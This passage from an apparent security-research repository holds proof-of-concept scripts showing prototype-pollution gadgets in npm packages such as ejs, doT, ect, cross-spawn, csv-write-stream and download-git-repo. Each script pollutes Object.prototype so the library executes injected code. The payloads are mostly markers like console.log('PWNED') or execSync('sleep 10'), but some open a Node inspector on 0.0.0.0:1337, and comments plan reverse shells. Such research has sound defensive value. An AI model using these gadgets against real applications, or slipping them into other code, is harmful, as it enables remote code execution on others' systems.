3 | Object.prototype.aaa = 'console.log("PWNED")';
4 | // Object.prototype.cache = true;
5 |
6 | cons.underscore('views/underscore.template.html', { name: 'tobi' })
7 | .then(function (html) {
8 | console.log(html);
9 | })
10 | .catch(function (err) {
11 | throw err;
12 | });
13 |
--------------------------------------------------------------------------------
/npm-packages/consolidate/views/underscore.template.html:
--------------------------------------------------------------------------------
1 | <%- name %>
--------------------------------------------------------------------------------
/npm-packages/crawler/crawler.PoC.js:
--------------------------------------------------------------------------------
1 | const Crawler = require('crawler');
2 |
3 | Object.prototype.repo = 'payload';
4 |
5 | const c = new Crawler({
6 | maxConnections: 10,
7 | // This will be called for each crawled page
8 | callback: (error, res, done) => {
9 | if (error) {
10 | console.log(error);
11 | } else {
12 | const $ = res.$;
13 | // $ is Cheerio by default
14 | // a lean implementation of core jQuery designed specifically for the server
15 | console.log($('title').text());
16 | }
17 | done();
18 | }
19 | });
20 |
21 | // Queue just one URL, with default callback
22 | c.queue('http://www.amazon.com');
--------------------------------------------------------------------------------
/npm-packages/crawler/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "crawler-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "crawler": "^1.4.0"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/cross-port-killer/cross-port-killer.PoC.js:
--------------------------------------------------------------------------------
1 | const { kill } = require('cross-port-killer');
2 |
3 | Object.prototype.shell = 'node'
4 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
5 |
6 | // TODO: try a reverse shell on Linux
7 |
8 | kill(9090).then(pids => {
9 | console.log(pids)
10 | })
--------------------------------------------------------------------------------
/npm-packages/cross-port-killer/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "cross-port-killer-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 2,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "cross-port-killer-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "cross-port-killer": "^1.4.0"
13 | }
14 | },
15 | "node_modules/cross-port-killer": {
16 | "version": "1.4.0",
17 | "resolved": "https://registry.npmjs.org/cross-port-killer/-/cross-port-killer-1.4.0.tgz",
18 | "integrity": "sha512-ujqfftKsSeorFMVI6JP25xMBixHEaDWVK+NarRZAGnJjR5AhebRQU+g+k/Lj8OHwM6f+wrrs8u5kkCdI7RLtxQ==",
19 | "bin": {
20 | "kill-port": "source/cli.js"
21 | }
22 | }
23 | },
24 | "dependencies": {
25 | "cross-port-killer": {
26 | "version": "1.4.0",
27 | "resolved": "https://registry.npmjs.org/cross-port-killer/-/cross-port-killer-1.4.0.tgz",
28 | "integrity": "sha512-ujqfftKsSeorFMVI6JP25xMBixHEaDWVK+NarRZAGnJjR5AhebRQU+g+k/Lj8OHwM6f+wrrs8u5kkCdI7RLtxQ=="
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/npm-packages/cross-port-killer/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "cross-port-killer-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "cross-port-killer": "^1.4.0"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/cross-spawn/cross-spawn.spawn.PoC.js:
--------------------------------------------------------------------------------
1 | const spawn = require('cross-spawn');
2 |
3 | Object.prototype.shell = "node";
4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
5 |
6 | // TODO: try a reverse shell
7 |
8 | const child = spawn('npm', ['list', '-g', '-depth', '0'], { stdio: 'inherit' });
--------------------------------------------------------------------------------
/npm-packages/cross-spawn/cross-spawn.spawn.sync.PoC.js:
--------------------------------------------------------------------------------
1 | const spawn = require('cross-spawn');
2 |
3 | Object.prototype.shell = "node";
4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
5 |
6 | // TODO: try a reverse shell
7 |
8 | const result = spawn.sync('npm', ['list', '-g', '-depth', '0'], { stdio: 'inherit' });
--------------------------------------------------------------------------------
/npm-packages/cross-spawn/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "cross-spawn-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "cross-spawn": "^7.0.3"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/csv-write-stream/csv-write-stream.PoC.js:
--------------------------------------------------------------------------------
1 | const fs = require('fs')
2 |
3 | const csvWriter = require('csv-write-stream')
4 |
5 | const payload = 'console.log("PWNED")';
6 | Object.prototype.separator = `,";${payload};result+="`;
7 |
8 | const writer = csvWriter()
9 | writer.pipe(fs.createWriteStream('out.csv'))
10 | writer.write({hello: "world", foo: "bar", baz: "taco"})
11 | writer.end()
--------------------------------------------------------------------------------
/npm-packages/csv-write-stream/out.csv:
--------------------------------------------------------------------------------
1 | hello,foo,baz
2 | world,bar,taco
3 |
--------------------------------------------------------------------------------
/npm-packages/csv-write-stream/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "csv-write-stream-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "csv-write-stream": "^2.0.0"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/divx.js:
--------------------------------------------------------------------------------
1 | console.log('PWNED')
--------------------------------------------------------------------------------
/npm-packages/doT/app-0.js:
--------------------------------------------------------------------------------
1 | 'use strict';
2 |
3 | var doT = require('dot');
4 |
5 | Object.prototype.global = "}process.mainModule.require('child_process').execSync(\`sleep 10\`)}())//";
6 |
7 | const templates = doT.process({path: __dirname+'/views'});
8 | var mytemplate = require(__dirname+'/views/mytemplate.js')
--------------------------------------------------------------------------------
/npm-packages/doT/app-1.js:
--------------------------------------------------------------------------------
1 | 'use strict';
2 |
3 | var doT = require('dot');
4 |
5 | Object.prototype.destination = "./"
6 |
7 | const templates = doT.process({path: __dirname+'/views'});
8 | var mytemplate = require(__dirname+'/views/mytemplate.js')
--------------------------------------------------------------------------------
/npm-packages/doT/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "doT@1.1.3",
3 | "lockfileVersion": 2,
4 | "requires": true,
5 | "packages": {
6 | "": {
7 | "dependencies": {
8 | "dot": "^1.0.3"
9 | }
10 | },
11 | "node_modules/dot": {
12 | "version": "1.0.3",
13 | "resolved": "https://registry.npmjs.org/dot/-/dot-1.0.3.tgz",
14 | "integrity": "sha512-b0ilWM9qrWChYO1D1cXgx6Z47nzKR3tTsiPBnhUZF02+vGj9iHXP0QhUcKIdk+VRSXeFvMqtJjAXALJBAq7R3A==",
15 | "engines": [
16 | "node >=0.2.6"
17 | ],
18 | "bin": {
19 | "dottojs": "bin/dot-packer"
20 | }
21 | }
22 | },
23 | "dependencies": {
24 | "dot": {
25 | "version": "1.0.3",
26 | "resolved": "https://registry.npmjs.org/dot/-/dot-1.0.3.tgz",
27 | "integrity": "sha512-b0ilWM9qrWChYO1D1cXgx6Z47nzKR3tTsiPBnhUZF02+vGj9iHXP0QhUcKIdk+VRSXeFvMqtJjAXALJBAq7R3A=="
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/npm-packages/doT/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "dependencies": {
3 | "dot": "^1.0.3"
4 | }
5 | }
6 |
--------------------------------------------------------------------------------
/npm-packages/doT/views/mytemplate.jst:
--------------------------------------------------------------------------------
1 | {{=it && it.data}}
2 | {{#def.test}}
--------------------------------------------------------------------------------
/npm-packages/doT/views/test.def:
--------------------------------------------------------------------------------
1 | 1
--------------------------------------------------------------------------------
/npm-packages/doT/views/test.dot:
--------------------------------------------------------------------------------
1 | {{=it && it.data}}
2 | {{#def.test}}
--------------------------------------------------------------------------------
/npm-packages/dockerfile_lint/dockerfile_lint.PoC.js:
--------------------------------------------------------------------------------
1 | var path = require('path');
2 | var DockerFileValidator = require('dockerfile_lint');
3 |
4 | Object.prototype.arrays = { regex: "console.log('PWNED')" };
5 |
6 | var validator = new DockerFileValidator(path.join(__dirname, 'dockerfile_rules.yml'));
7 |
--------------------------------------------------------------------------------
/npm-packages/dockerfile_lint/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dockerfile_lint-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "dockerfile_lint": "^0.3.4"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/dot/dot.PoC.js:
--------------------------------------------------------------------------------
1 | var dotPkg = require("dot");
2 |
3 | Object.prototype.aaa = 'console.log("PWNED")'
4 |
5 | var dots = dotPkg.process({path: "./views"});
6 | // var res = dots.mytemplate({foo:"hello world"});
7 | // console.log(res);
--------------------------------------------------------------------------------
/npm-packages/dot/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dot-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 2,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "dot-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "dot": "^1.1.3"
13 | }
14 | },
15 | "node_modules/dot": {
16 | "version": "1.1.3",
17 | "resolved": "https://registry.npmjs.org/dot/-/dot-1.1.3.tgz",
18 | "integrity": "sha512-/nt74Rm+PcfnirXGEdhZleTwGC2LMnuKTeeTIlI82xb5loBBoXNYzr2ezCroPSMtilK8EZIfcNZwOcHN+ib1Lg==",
19 | "engines": [
20 | "node >=0.2.6"
21 | ],
22 | "bin": {
23 | "dottojs": "bin/dot-packer"
24 | }
25 | }
26 | },
27 | "dependencies": {
28 | "dot": {
29 | "version": "1.1.3",
30 | "resolved": "https://registry.npmjs.org/dot/-/dot-1.1.3.tgz",
31 | "integrity": "sha512-/nt74Rm+PcfnirXGEdhZleTwGC2LMnuKTeeTIlI82xb5loBBoXNYzr2ezCroPSMtilK8EZIfcNZwOcHN+ib1Lg=="
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/npm-packages/dot/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dot-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "dot": "1.1.3"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/dot/views/mytemplate.jst:
--------------------------------------------------------------------------------
1 | {{=it.foo}}
--------------------------------------------------------------------------------
/npm-packages/download-git-repo/download-git-repo.PoC.js:
--------------------------------------------------------------------------------
1 | const download = require('download-git-repo');
2 |
3 | // TODO: replace to reverse shell
4 | Object.prototype.clone = true;
5 | Object.prototype.GIT_SSH_COMMAND = "calc";
6 | //Object.prototype.git = "calc"; // we can also control a process name
7 |
8 | download('user/repo', 'test/tmp', function (err) {
9 | console.log(err ? 'Error' : 'Success')
10 | })
--------------------------------------------------------------------------------
/npm-packages/download-git-repo/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "download-git-repo-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "download-git-repo": "^3.0.2"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/dtrace-provider/dtrace-provider.PoC.js:
--------------------------------------------------------------------------------
1 | // see npm-packages\node_modules\DTraceProviderBindings.js
2 | Object.prototype.a = '../../../../node_modules'
3 |
4 | require('dtrace-provider')
--------------------------------------------------------------------------------
/npm-packages/dtrace-provider/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dtrace-provider-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 2,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "dtrace-provider-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "dtrace-provider": "0.8.5"
13 | }
14 | },
15 | "node_modules/dtrace-provider": {
16 | "version": "0.8.5",
17 | "resolved": "https://registry.npmjs.org/dtrace-provider/-/dtrace-provider-0.8.5.tgz",
18 | "integrity": "sha512-zQxnhjAIKdQKqeTEh7dspe0rlR4jqnrd9miUMPyhJZM2n0XjPcpERwJ6HWDvp7iJ4fpOpAnVnItYHQ/C+2vBBg==",
19 | "hasInstallScript": true,
20 | "dependencies": {
21 | "nan": "^2.3.3"
22 | },
23 | "engines": {
24 | "node": ">=0.10"
25 | }
26 | },
27 | "node_modules/nan": {
28 | "version": "2.17.0",
29 | "resolved": "https://registry.npmjs.org/nan/-/nan-2.17.0.tgz",
30 | "integrity": "sha512-2ZTgtl0nJsO0KQCjEpxcIr5D+Yv90plTitZt9JBfQvVJDS5seMl3FOvsh3+9CoYWXf/1l5OaZzzF6nDm4cagaQ=="
31 | }
32 | },
33 | "dependencies": {
34 | "dtrace-provider": {
35 | "version": "0.8.5",
36 | "resolved": "https://registry.npmjs.org/dtrace-provider/-/dtrace-provider-0.8.5.tgz",
37 | "integrity": "sha512-zQxnhjAIKdQKqeTEh7dspe0rlR4jqnrd9miUMPyhJZM2n0XjPcpERwJ6HWDvp7iJ4fpOpAnVnItYHQ/C+2vBBg==",
38 | "requires": {
39 | "nan": "^2.3.3"
40 | }
41 | },
42 | "nan": {
43 | "version": "2.17.0",
44 | "resolved": "https://registry.npmjs.org/nan/-/nan-2.17.0.tgz",
45 | "integrity": "sha512-2ZTgtl0nJsO0KQCjEpxcIr5D+Yv90plTitZt9JBfQvVJDS5seMl3FOvsh3+9CoYWXf/1l5OaZzzF6nDm4cagaQ=="
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/npm-packages/dtrace-provider/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dtrace-provider-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "dtrace-provider": "0.8.5"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/dustjs/app-0.js:
--------------------------------------------------------------------------------
1 | var dust = require('dustjs-linkedin');
2 |
3 | Object.prototype.title = "ARBITRARY VALUE HERE :>";
4 |
5 | var tmpl = dust.compile("{#names}{title} {name}{~n}{/names}", "array");
6 | dust.loadSource(tmpl);
7 |
8 | dust.render("array", { title: "Sir", names: [ { name: "Moe" }, { name: "Larry" }, { name: "Curly" } ] }, function(err, out) {
9 | console.log(out)
10 | });
--------------------------------------------------------------------------------
/npm-packages/dustjs/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "dependencies": {
3 | "dustjs-linkedin": "^3.0.1"
4 | }
5 | }
6 |
--------------------------------------------------------------------------------
/npm-packages/dustjs/views/hello.dust:
--------------------------------------------------------------------------------
1 | Hello Dust!
2 |
--------------------------------------------------------------------------------
/npm-packages/dustjs/views/includes/mood.dust:
--------------------------------------------------------------------------------
1 | {mood}
2 |
--------------------------------------------------------------------------------
/npm-packages/dustjs/views/index.dust:
--------------------------------------------------------------------------------
1 | I'm feeling {@shout}{> "includes/mood" /}{/shout}
--------------------------------------------------------------------------------
/npm-packages/ect/app-0.js:
--------------------------------------------------------------------------------
1 | var ECT = require('ect');
2 |
3 | Object.prototype.indent = "process.mainModule.require('child_process').execSync('sleep 10')\n//";
4 |
5 | var renderer = ECT({ root : {
6 | layout: '<%- @title %><% content %>',
7 | page: '<% extend "layout" %>Page content
'
8 | }
9 | });
10 |
11 | var html = renderer.render('page', { title: 'Hello, World!' });
12 |
13 |
--------------------------------------------------------------------------------
/npm-packages/ect/app-1.js:
--------------------------------------------------------------------------------
1 | var ECT = require('ect');
2 |
3 | Object.prototype.inlineMap = true;
4 | Object.prototype.filename = "\n})\nprocess.mainModule.require('child_process').execSync('sleep 10')\n({";
5 |
6 |
7 | var renderer = ECT({ root : {
8 | layout: '<%- @title %><% content %>',
9 | page: '<% extend "layout" %>Page content
'
10 | }
11 | });
12 |
13 | var html = renderer.render('page', { title: 'Hello, World!' });
14 |
15 |
--------------------------------------------------------------------------------
/npm-packages/ect/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "dependencies": {
3 | "ect": "^0.5.9"
4 | }
5 | }
6 |
--------------------------------------------------------------------------------
/npm-packages/ect/views/extra.ect:
--------------------------------------------------------------------------------
1 | Include me!
--------------------------------------------------------------------------------
/npm-packages/ect/views/footer.html:
--------------------------------------------------------------------------------
1 | Footer content
--------------------------------------------------------------------------------
/npm-packages/ect/views/header.html:
--------------------------------------------------------------------------------
1 | Page title
--------------------------------------------------------------------------------
/npm-packages/ect/views/index.ect:
--------------------------------------------------------------------------------
1 | <% extend 'layout' %>
2 | <% include 'extra' %>
3 | Hello, World!
--------------------------------------------------------------------------------
/npm-packages/ect/views/layout.ect:
--------------------------------------------------------------------------------
1 |
2 |
3 | <% content %>
4 |
5 |
--------------------------------------------------------------------------------
/npm-packages/ect/views/layout.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | <%- @title %>
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/npm-packages/ect/views/page.html:
--------------------------------------------------------------------------------
1 | <% extend 'sublayout' %>
2 |
3 | Page content
4 |
5 | <% block 'side1' : %>
6 | redefined side1 content
7 | <% end %>
8 | <% block 'side2' : %>
9 | side2 content
10 | <% end %>
11 |
--------------------------------------------------------------------------------
/npm-packages/ect/views/sublayout.html:
--------------------------------------------------------------------------------
1 | <% extend 'layout' %>
2 |
3 | <% content() %>
4 |
5 | <% block 'side1' : %>
6 | side1 content
7 | <% end %>
--------------------------------------------------------------------------------
/npm-packages/ejs/ejs.PoC.js:
--------------------------------------------------------------------------------
1 | const ejs = require('ejs');
2 |
3 | Object.prototype.client = 'true';
4 | Object.prototype.escapeFunction = 'function() {console.log("PWNED")}';
5 |
6 | const template = '<%= name %>
';
7 | ejs.render(template, {name: 'John'}, {});
--------------------------------------------------------------------------------
/npm-packages/ejs/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "ejs-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "ejs": "3.1.9"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-0.js:
--------------------------------------------------------------------------------
1 | const ejs = require('ejs')
2 | const path = require('path');
3 |
4 | Object.prototype.client = true
5 | Object.prototype.escape = "false;\nprocess.mainModule.require('child_process').execSync(\`sleep 10\`)\n"
6 |
7 | // Define the template string
8 | const templateString = `
9 | Hello, <%= name %>!
10 | Today is <%= date %>.
11 | `;
12 |
13 | // Compile the template string into a template function
14 | const templateFunction = ejs.compile(templateString);
15 |
16 | // Define the data object
17 | const data = {
18 | name: 'John Doe',
19 | date: new Date().toLocaleDateString()
20 | };
21 |
22 | // Render the template with the data object
23 | const output = templateFunction(data);
24 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-1.js:
--------------------------------------------------------------------------------
1 | const ejs = require('ejs')
2 | const path = require('path');
3 | const templatePath = path.join(__dirname, 'views', 'login_register.ejs');
4 |
5 | Object.prototype.client = true
6 | Object.prototype.escapeFunction = "false;\nprocess.mainModule.require('child_process').execSync(\`sleep 10\`)\n"
7 |
8 | var result = ejs.renderFile(templatePath, {
9 | title:" storeHtml | logins ",
10 | buttonHintF:"login",
11 | buttonHintS:"No account? Register now",
12 | hint:"login",
13 | next:"/register"
14 | })
15 |
16 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-2.js:
--------------------------------------------------------------------------------
1 | const ejs = require('ejs')
2 | const path = require('path');
3 | const templatePath = path.join(__dirname, 'views', 'login_register.ejs');
4 |
5 |
6 | Object.prototype.destructuredLocals = ["__line=__line;global.process.mainModule.require('child_process').exec('bash -c \"sleep 10\"');//"]
7 |
8 |
9 | var result = ejs.renderFile(templatePath, {
10 | title:" storeHtml | logins ",
11 | buttonHintF:"login",
12 | buttonHintS:"No account? Register now",
13 | hint:"login",
14 | next:"/register"
15 | })
16 |
17 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-3.js:
--------------------------------------------------------------------------------
1 | const ejs = require('ejs')
2 | const path = require('path');
3 | const templatePath = path.join(__dirname, 'views', 'login_register.ejs');
4 |
5 | Object.prototype.localsName = "it=process.mainModule.require('child_process').execSync(\`sleep 10\`)"
6 |
7 | var result = ejs.renderFile(templatePath, {
8 | title:" storeHtml | logins ",
9 | buttonHintF:"login",
10 | buttonHintS:"No account? Register now",
11 | hint:"login",
12 | next:"/register"
13 | })
14 |
15 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "htmlstore",
3 | "version": "1.0.0",
4 | "description": "htmlStore will help you store html file.",
5 | "main": "server.js",
6 | "scripts": {
7 | "test": "echo \"Error: no test specified\" && exit 1"
8 | },
9 | "author": "",
10 | "license": "ISC",
11 | "dependencies": {
12 | "ejs": "^2.7.4",
13 | "express": "^4.17.1"
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/views/footer.ejs:
--------------------------------------------------------------------------------
1 |
4 |
5 |